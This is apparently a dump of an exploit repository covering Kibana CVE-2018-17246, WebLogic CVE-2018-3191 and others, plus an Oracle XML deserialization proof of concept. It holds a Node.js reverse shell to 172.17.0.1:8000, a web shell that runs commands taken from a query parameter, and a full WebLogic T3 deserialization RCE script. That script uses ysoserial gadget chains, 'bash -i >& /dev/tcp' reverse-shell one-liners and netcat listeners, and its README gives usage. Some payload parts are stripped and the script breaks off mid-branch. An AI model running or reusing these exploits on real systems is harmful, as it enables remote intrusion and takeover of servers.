├── cve-2018-17246
├── README.md
├── rshell.js
└── webshell.js
├── cve-2018-2894
└── README.md
├── cve-2018-3004
├── DecodeMe.sql
└── README.md
├── cve-2018-3191
├── README.md
├── cve-2018-3191.py
├── weblogic-spring-jndi-10.3.6.0.jar
└── ysoserial-master-ecc60747a5-1.jar
├── cve-2019-2725
├── README.md
├── cve-2019-2725.py
└── payload.xml
├── redis
├── README.md
└── redis.py
└── weblogic_dser
├── README.md
├── weblogic_dser.py
└── ysoserial-cve-2018-3245.jar
/cve-2018-17246/README.md:
--------------------------------------------------------------------------------
1 | Write up at https://buffered4ever.com/2019/06/08/kibana-local-file-inclusion-cve-2018-17246/
2 |
--------------------------------------------------------------------------------
/cve-2018-17246/rshell.js:
--------------------------------------------------------------------------------
1 | (function(){ // Node.js reverse-shell PoC from the CVE-2018-17246 (Kibana) write-up: spawns /bin/sh and bridges its stdio to an outbound TCP socket. From the defender's side the signals are a Node/Kibana process spawning a shell via child_process and opening an egress connection to an unexpected host:port; patching Kibana and restricting egress from the Kibana host are the mitigations.
2 | var net = require("net"),
3 | cp = require("child_process"),
4 | sh = cp.spawn("/bin/sh", []); // child shell whose stdin/stdout/stderr are wired to the socket below
5 | var client = new net.Socket();
6 | client.connect(8000, "172.17.0.1", function(){ // hard-coded listener host and port
7 | client.pipe(sh.stdin); // bytes received on the socket become shell input
8 | sh.stdout.pipe(client); // shell output is sent back over the same socket
9 | sh.stderr.pipe(client);
10 | });
11 | return /a/; // Prevents the Node.js application from crashing
12 | })();
13 |
14 |
--------------------------------------------------------------------------------
/cve-2018-17246/webshell.js:
--------------------------------------------------------------------------------
1 | var sys = require('sys'), // 'sys' is the deprecated alias of 'util' and is never used below
2 | exec = require('child_process').exec,
3 | child, // assigned a function further down
4 | http = require('http');
5 |
6 | child = function(res, cmd) { // runs `cmd` through a shell and ends the HTTP response with its stdout
7 | exec(cmd,
8 | function (error, stdout, stderr) {
9 | res.end(stdout); // stderr is dropped; only stdout reaches the HTTP client
10 | if (error !== null) {
11 | console.log('exec error: ' + error); // logged locally, never reported to the client
12 | }
13 | });
14 | };
15 |
16 | http.createServer(function (req, res) { // web-shell PoC from the CVE-2018-17246 write-up: the `name` query parameter is executed verbatim by child(). Defender signals: a Node process binding an unexpected port and passing request data to child_process.exec; mitigation is patching Kibana and restricting ingress/egress on the host.
17 | res.writeHead(200, {'Content-Type': 'text/plain'});
18 | var parsedRequest = require('url').parse(req.url, true); // `true` parses the query string into an object
19 | var cmd = parsedRequest.query['name']; // untrusted input, handed straight to exec()
20 | if (cmd != undefined) // loose comparison: also skips null
21 | {
22 | console.log("[cmd] " + cmd);
23 | child(res, cmd);
24 | }
25 | }).listen('6660', '0.0.0.0'); // binds all interfaces on port 6660
26 |
27 |
--------------------------------------------------------------------------------
/cve-2018-2894/README.md:
--------------------------------------------------------------------------------
1 | Write up at https://buffered4ever.com/2019/06/09/cve-2018-2894-weblogic-jsp-file-upload/
2 |
--------------------------------------------------------------------------------
/cve-2018-3004/DecodeMe.sql:
--------------------------------------------------------------------------------
1 | create or replace and compile java source named DecodeMe as
2 | import java.io.*;
3 | import java.beans.*;
4 | public class DecodeMe{
5 | public static void input(String xml) throws InterruptedException, IOException { // PoC for CVE-2018-3004: caller-supplied XML is handed to java.beans.XMLDecoder, which instantiates whatever classes the document names, inside the database JVM
6 |
7 | XMLDecoder decoder = new XMLDecoder ( new ByteArrayInputStream(xml.getBytes())); // untrusted XML deserialized with no class restrictions
8 | Object object = decoder.readObject();
9 | System.out.println(object.toString());
10 | decoder.close();
11 |
12 | }
13 | }
14 | ;
15 | /
16 |
17 | CREATE OR REPLACE PROCEDURE decodeme (p_xml IN VARCHAR2) IS -- PL/SQL wrapper so the Java method can be called from SQL
18 | language java name 'DecodeMe.input(java.lang.String)';
19 | /
20 |
21 | BEGIN -- the XML document passed to decodeme() has lost its element markup in this listing and original lines 25-31 are absent; mitigation is Oracle's patch for CVE-2018-3004 plus restricting the privileges needed to load Java sources into the database
22 | decodeme('
23 |
24 |
32 |
33 | ');
34 | END;
35 | /
36 |
--------------------------------------------------------------------------------
/cve-2018-3004/README.md:
--------------------------------------------------------------------------------
1 | Write up at https://buffered4ever.com/2019/06/08/cve-2018-3004-oracle-privilege-escalation-via-xml-deserialization/
2 |
--------------------------------------------------------------------------------
/cve-2018-3191/README.md:
--------------------------------------------------------------------------------
1 | weblogic-spring-jndi-12.2.1.3.jar can be downloaded from the following link:
2 | https://github.com/buffered4ever/Exploits/releases/download/1.0/weblogic-spring-jndi-12.2.1.3.jar
3 |
4 | Usage:
5 |
6 | To run arbitrary commands
7 | python cve-2018-3191.py -c ''
8 |
9 | To get a reverse shell
10 | python cve-2018-3191.py -rs
11 |
12 | In case of SSL,
13 | To run arbitrary commands
14 | python cve-2018-3191.py -c '' -ssl
15 |
16 | To get a reverse shell
17 | python cve-2018-3191.py -rs -ssl
18 |
--------------------------------------------------------------------------------
/cve-2018-3191/cve-2018-3191.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # This code exploits the CVE-2018-3191 unauthenticated RCE vulnerability in WebLogic
3 | #
4 | #
5 | # https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html
6 | # https://mp.weixin.qq.com/s/ebKHjpbQcszAy_vPocW0Sg
7 | # https://github.com/pyn3rd/CVE-2018-3191
8 | # The vulnerability affects supported versions:
9 | # 10.3.6.0, 12.2.1.0, 12.1.3.0, 12.2.1.1, 12.2.1.3
10 | #Tested on docker https://hub.docker.com/r/ismaleiva90/weblogic12/ (12.1.3.0)
11 | #Tested on docker https://hub.docker.com/r/zhiqzhao/ubuntu_weblogic1036_domain/ (10.3.6.0)
12 |
13 | # Information for building the exploit was taken from here: https://github.com/voidfyoo/CVE-2018-3191 and https://github.com/pyn3rd/CVE-2018-3191
14 | # The version of ysoserial used in this exploit can be found at https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
15 |
16 | # Dunstan Pinto, 14/11/2018 (dunstan.pinto@gmail.com)
17 |
18 | import socket
19 | import os
20 | import sys
21 | import struct
22 | import time
23 | import ssl
24 |
25 | def t3_handshake_rs(sock,server_addr): # connects and sends the T3/T3S protocol banner; the hex below decodes to "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\n\n" (the t3s variant starts with "t3s"). Used by the -rs path; the -ssl switch is read from sys.argv[5], not from a parameter. T3 handshakes arriving from untrusted networks are the detection signal; blocking T3/T3S at the perimeter or with WebLogic's connection filter is the usual mitigation.
26 | sock.connect(server_addr)
27 | if len(sys.argv) > 5:
28 | if sys.argv[5] == '-ssl':
29 | sock.send('7433732031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex')) # "t3s 12.2.1 ..." banner (Python 2 str.decode('hex'))
30 | else:
31 | print "Use -ssl option if weblogic server uses t3s"
32 | exit()
33 | else:
34 | sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex')) # plain "t3 12.2.1 ..." banner
35 | time.sleep(1)
36 | sock.recv(1024) # the server's reply is discarded, so the message below does not confirm anything
37 | print 't3 handshake successful'
38 |
39 | def t3_handshake_run(sock,server_addr): # same handshake as t3_handshake_rs, but for the -c path, whose extra positional argument moves the -ssl switch to sys.argv[6]
40 | sock.connect(server_addr)
41 | if len(sys.argv) > 6:
42 | if sys.argv[6] == '-ssl':
43 | sock.send('7433732031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex')) # "t3s 12.2.1 ..." banner
44 | else:
45 | print "Use -ssl option if weblogic server uses t3s"
46 | exit()
47 | else:
48 | sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex')) # plain "t3 12.2.1 ..." banner
49 | time.sleep(1)
50 | sock.recv(1024) # reply discarded
51 | print 't3 handshake successful'
52 |
53 |
54 | #function to get a reverse shell
55 | def rs(dip,dport,switch,sip,sslflag=False): # reverse-shell path: asks for a ysoserial gadget chain, runs the T3 handshake over the module-global `sock` (not a parameter; created under __main__), then opens a JRMPListener on 1099 and a netcat listener in new terminals. `switch` and `sslflag` are unused here. On the target side this shows up as outbound connections from the WebLogic host to `sip` on ports 1099 and 8000.
56 | server_addr = (dip, dport)
57 | print "Select the payload"
58 | jpayload = raw_input("1. CommonsCollections1 - commons-collections:3.1\n2. CommonsCollections2 - commons-collections4:4.0\n3. CommonsCollections3 - commons-collections:3.1\n4. CommonsCollections4 - commons-collections4:4.0\n5. CommonsCollections5 - commons-collections:3.1 and works with <=JRE 8u72\n6. CommonsCollections6 - commons-collections:3.1 and works with <=JRE 8u72\n7. Jdk7u21 - <=Jdk7u21\n")
59 | if jpayload == '1':
60 | t3_handshake_rs(sock,server_addr)
61 | print 'Generating ysoserial CommonsCollections1 payload'
62 | os.system("mate-terminal --command 'java -cp ysoserial-master-ecc60747a5-1.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 \"bash -c $@|bash . echo bash -i >& /dev/tcp/{0}/8000 0>&1\"'".format(sip)) # the listener answers the target's JNDI/RMI lookup with the chosen gadget chain; each branch below differs only in the gadget name
63 | time.sleep(3)
64 | os.system("mate-terminal --command 'nc -lvp 8000'") # catches the shell the gadget chain connects back to
65 |
66 | elif jpayload == '2':
67 | t3_handshake_rs(sock,server_addr)
68 | print 'Generating ysoserial CommonsCollections2 payload'
69 | os.system("mate-terminal --command 'java -cp ysoserial-master-ecc60747a5-1.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections2 \"bash -c $@|bash . echo bash -i >& /dev/tcp/{0}/8000 0>&1\"'".format(sip))
70 | time.sleep(3)
71 | os.system("mate-terminal --command 'nc -lvp 8000'")
72 | elif jpayload == '3':
73 | t3_handshake_rs(sock,server_addr)
74 | print 'Generating ysoserial CommonsCollections3 payload'
75 | os.system("mate-terminal --command 'java -cp ysoserial-master-ecc60747a5-1.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections3 \"bash -c $@|bash . echo bash -i >& /dev/tcp/{0}/8000 0>&1\"'".format(sip))
76 | time.sleep(3)
77 | os.system("mate-terminal --command 'nc -lvp 8000'")
78 | elif jpayload == '4':
79 | t3_handshake_rs(sock,server_addr)
80 | print 'Generating ysoserial CommonsCollections4 payload'
81 | os.system("mate-terminal --command 'java -cp ysoserial-master-ecc60747a5-1.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections4 \"bash -c $@|bash . echo bash -i >& /dev/tcp/{0}/8000 0>&1\"'".format(sip))
82 | time.sleep(3)
83 | os.system("mate-terminal --command 'nc -lvp 7000'")
84 | elif jpayload == '5':
85 | t3_handshake_rs(sock,server_addr)
86 | print 'Generating ysoserial CommonsCollections5 payload'
87 | os.system("mate-terminal --command 'java -cp ysoserial-master-ecc60747a5-1.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections5 \"bash -c $@|bash . echo bash -i >& /dev/tcp/{0}/8000 0>&1\"'".format(sip))
88 | time.sleep(3)
89 | os.system("mate-terminal --command 'nc -lvp 8000'")
90 | elif jpayload == '6':
91 | t3_handshake_rs(sock,server_addr)
92 | print 'Generating ysoserial CommonsCollections6 payload'
93 | os.system("mate-terminal --command 'java -cp ysoserial-master-ecc60747a5-1.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections6 \"bash -c $@|bash . echo bash -i >& /dev/tcp/{0}/8000 0>&1\"'".format(sip))
94 | time.sleep(3)
95 | os.system("mate-terminal --command 'nc -lvp 8000'")
96 | elif jpayload == '7':
97 | t3_handshake_rs(sock,server_addr)
98 | print 'Generating ysoserial Jdk7u21 payload'
99 | os.system("mate-terminal --command 'java -cp ysoserial-master-ecc60747a5-1.jar ysoserial.exploit.JRMPListener 1099 Jdk7u21 \"bash -c $@|bash . echo bash -i >& /dev/tcp/{0}/8000 0>&1\"'".format(sip))
100 | time.sleep(3)
101 | os.system("mate-terminal --command 'nc -lvp 8000'")
102 | else:
103 | print "Select one of the 7 payloads"
104 | exit() # any other choice aborts the whole script
105 |
106 |
107 | #function to run arbitrary commands on the server
108 | def run(dip,dport,switch,cmd,sip,sslflag=False): # single-command path: like rs(), but the JRMPListener is started with `cmd` instead of a shell one-liner and no netcat listener is opened. Uses the module-global `sock`; `switch` and `sslflag` are unused. `cmd` is interpolated into a local shell string, so it is the operator's own input, not target data.
109 | server_addr = (dip, dport)
110 | print "Select the payload"
111 | jpayload = raw_input("1. CommonsCollections1 - commons-collections:3.1\n2. CommonsCollections2 - commons-collections4:4.0\n3. CommonsCollections3 - commons-collections:3.1\n4. CommonsCollections4 - commons-collections4:4.0\n5. CommonsCollections5 - commons-collections:3.1 and works with <=JRE 8u72\n6. CommonsCollections6 - commons-collections:3.1 and works with <=JRE 8u72\n7. Jdk7u21 - <=Jdk7u21\n")
112 | if jpayload == '1':
113 | t3_handshake_run(sock,server_addr)
114 | print 'Generating ysoserial CommonsCollections1 payload'
115 | os.system("mate-terminal --command 'java -cp ysoserial-master-ecc60747a5-1.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 \"{}\"'".format(cmd)) # branches below differ only in the gadget name
116 | time.sleep(3)
117 | elif jpayload == '2':
118 | t3_handshake_run(sock,server_addr)
119 | print 'Generating ysoserial CommonsCollections2 payload'
120 | os.system("mate-terminal --command 'java -cp ysoserial-master-ecc60747a5-1.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections2 \"{}\"'".format(cmd))
121 | time.sleep(3)
122 | elif jpayload == '3':
123 | t3_handshake_run(sock,server_addr)
124 | print 'Generating ysoserial CommonsCollections3 payload'
125 | os.system("mate-terminal --command 'java -cp ysoserial-master-ecc60747a5-1.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections3 \"{}\"'".format(cmd))
126 | time.sleep(3)
127 | elif jpayload == '4':
128 | t3_handshake_run(sock,server_addr)
129 | print 'Generating ysoserial CommonsCollections4 payload'
130 | os.system("mate-terminal --command 'java -cp ysoserial-master-ecc60747a5-1.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections4 \"{}\"'".format(cmd))
131 | time.sleep(3)
132 | elif jpayload == '5':
133 | t3_handshake_run(sock,server_addr)
134 | print 'Generating ysoserial CommonsCollections5 payload'
135 | os.system("mate-terminal --command 'java -cp ysoserial-master-ecc60747a5-1.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections5 \"{}\"'".format(cmd))
136 | time.sleep(3)
137 | elif jpayload == '6':
138 | t3_handshake_run(sock,server_addr)
139 | print 'Generating ysoserial CommonsCollections6 payload'
140 | os.system("mate-terminal --command 'java -cp ysoserial-master-ecc60747a5-1.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections6 \"{}\"'".format(cmd))
141 | time.sleep(3)
142 | elif jpayload == '7':
143 | t3_handshake_run(sock,server_addr)
144 | print 'Generating ysoserial Jdk7u21 payload'
145 | os.system("mate-terminal --command 'java -cp ysoserial-master-ecc60747a5-1.jar ysoserial.exploit.JRMPListener 1099 Jdk7u21 \"{}\"'".format(cmd))
146 | time.sleep(3)
147 | else:
148 | print "Select one of the 7 payloads"
149 | exit() # any other choice aborts the whole script
150 |
151 | def general_usage(): # prints the CLI help; the example strings appear to have lost their argument placeholders in this listing
152 | print "Use the -c switch to execute an arbitrary command on the weblogic server, for e.g.: python cve-2018-3191.py -c '' "
153 | print "Use the -rs switch to get a reverse shell, for e.g.: python cve-2018-3191.py -rs "
154 | print "Incase of SSL:"
155 | print "Use the -c switch to execute an arbitrary command on the weblogic server and -ssl switch to connect using t3s, for e.g.: python cve-2018-3191.py -c '' -ssl"
156 | print "Use the -rs switch to get a reverse shell and -ssl switch to connect using t3s, for e.g.: python cve-2018-3191.py -rs -ssl"
157 |
158 |
159 | if __name__=="__main__": # CLI entry: argv = target ip, target port, switch (-rs | -c), [cmd], listener ip, [-ssl]. Both branches build the same T3 message around a serialized object produced by the helper jar and send it over the module-global `sock`. Mitigation for CVE-2018-3191 is Oracle's October 2018 CPU (link in the header) plus restricting T3/T3S to trusted networks; a missing argument anywhere raises IndexError and prints usage.
160 | try:
161 | dip = sys.argv[1]
162 | dport = int(sys.argv[2])
163 | switch = sys.argv[3]
164 |
165 | if switch == '-rs':
166 | try:
167 | sip = sys.argv[4]
168 | if len(sys.argv) > 5:
169 | if sys.argv[5] == '-ssl':
170 | sslflag = True
171 | print "[+] ssl mode enabled"
172 | sock = ssl.wrap_socket(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) # module-global socket; rs() and t3_handshake_rs() read it by name
173 | sock.settimeout(20)
174 | rs(dip,dport,switch,sip,sslflag)
175 | else:
176 | print "Use -ssl option if weblogic server uses t3s"
177 | exit()
178 |
179 | else:
180 | print "[+] ssl mode disabled"
181 | sslflag = False
182 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
183 | rs(dip,dport,switch,sip) # handshake happens inside rs(); the timeout below is set afterwards in this branch
184 | sock.settimeout(20)
185 | print 'Exploiting CVE-2018-3191 to get a reverse shell'
186 | print "Based on your weblogic server version, select any one of the payloads"
187 | jndipayload = raw_input("1. 10.3.6.0.jar - for versions 10.3.6.0, 12.2.1.0, 12.1.3.0 and 12.2.1.1\n2. 12.2.1.3.jar - for version 12.2.1.3\n")
188 | if jndipayload == '1':
189 | payloadObj = os.popen(("java -jar weblogic-spring-jndi-10.3.6.0.jar rmi://{0}:1099/Object").format(sip)).read() # helper jar emits a serialized object that references rmi://sip:1099; it is spliced into the T3 message below
190 | elif jndipayload == '2':
191 | payloadObj = os.popen(("java -jar weblogic-spring-jndi-12.2.1.3.jar rmi://{0}:1099/Object").format(sip)).read()
192 | else:
193 | print "Select one of the 2 payloads"
194 | exit()
195 | payload='\x00\x00\x09\xf3\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00' # static T3 message prefix: 4-byte length header (patched below), then serialized WebLogic protocol objects (class names such as weblogic.rjvm.ClassTableEntry are readable in the bytes)
196 | payload=payload+payloadObj # the helper jar's object goes in the middle of the message
197 | payload=payload+'\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\
x6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78'
198 | # adjust header for appropriate message length
199 | payload=struct.pack('>I',len(payload)) + payload[4:] # the first four bytes of a T3 message carry its total length
200 | print '[+] Payload sent!' # printed before the send actually happens
201 | try:
202 | sock.send(payload)
203 | data = sock.recv(1024) # reply is read but never inspected
204 | except:
205 | sock.close() # bare except: any send/recv failure is silently closed
206 | except IndexError:
207 | print "Usage: python cve-2018-3191.py -rs "
208 | print "For SSL: python cve-2018-3191.py -rs -ssl"
209 |
210 | if switch == '-c':
211 | try:
212 | cmd = sys.argv[4]
213 | sip = sys.argv[5]
214 | if len(sys.argv) > 6:
215 | if sys.argv[6] == '-ssl':
216 | sslflag = True
217 | print "[+] ssl mode enabled"
218 | sock = ssl.wrap_socket(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) # module-global socket; run() and t3_handshake_run() read it by name
219 | sock.settimeout(20)
220 | run(dip,dport,switch,cmd,sip,sslflag)
221 | else:
222 | print "Use -ssl option if weblogic server uses t3s"
223 | exit()
224 | else:
225 | print "[+] ssl mode disabled"
226 | sslflag = False
227 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
228 | run(dip,dport,switch,cmd,sip)
229 | sock.settimeout(20)
230 | print "Exploiting CVE-2018-3191 to get run the command '{}'".format(cmd)
231 | print "Based on your weblogic server version, select any one of the payloads"
232 | jndipayload = raw_input("1. 10.3.6.0.jar - for versions 10.3.6.0, 12.2.1.0, 12.1.3.0 and 12.2.1.1\n2. 12.2.1.3.jar - for version 12.2.1.3\n")
233 | if jndipayload == '1':
234 | payloadObj = os.popen(("java -jar weblogic-spring-jndi-10.3.6.0.jar rmi://{0}:1099/Object").format(sip)).read() # same helper-jar object as in the -rs branch
235 | elif jndipayload == '2':
236 | payloadObj = os.popen(("java -jar weblogic-spring-jndi-12.2.1.3.jar rmi://{0}:1099/Object").format(sip)).read()
237 | else:
238 | print "Select one of the 2 payloads"
239 | exit()
240 | payload='\x00\x00\x09\xf3\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00' # identical static prefix to the -rs branch
241 | payload=payload+payloadObj
